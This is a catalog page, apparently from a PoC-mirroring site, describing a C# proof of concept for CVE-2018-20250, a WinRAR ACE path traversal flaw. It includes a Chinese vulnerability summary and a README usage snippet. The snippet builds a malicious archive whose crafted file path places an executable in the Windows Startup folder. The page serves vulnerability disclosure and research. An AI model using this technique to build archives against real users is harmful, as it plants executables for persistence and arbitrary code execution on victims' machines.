CVE-2018-20250 PoC — WinRar 路径遍历漏洞

Source

https://github.com/easis/CVE-2018-20250-WinRAR-ACE

Associated Vulnerability

Title:WinRar 路径遍历漏洞 (CVE-2018-20250)
Description:WinRAR是一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。 WinRar中存在目录遍历漏洞。该漏洞源于WinRAR在解压处理ACE格式的文件过程中，未对ACE文件头结构中的“filename”字段进行充分过滤。攻击者可利用该漏洞以提升的权限执行任意代码。

Description

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Readme

# CVE-2018-20250-WinRAR-ACE
Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

# Resources
https://research.checkpoint.com/extracting-code-execution-from-winrar/
https://github.com/droe/acefile
https://apidoc.roe.ch/acefile/latest/

# Dependencies
InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

# How to use
```csharp
  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");
```

# Bugs
Seems that it only extracts to startup folder when the .rar file is in Desktop or any folder on the same level.

File Snapshot


 [4.0K]  /data/pocs/8cea497a8987d7cee82a1813697485d52d35ca04
├── [6.6K]  AceFile.cs
├── [6.2K]  AceVolume.cs
├── [ 787]  README.md
└── [ 415]  Utils.cs

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!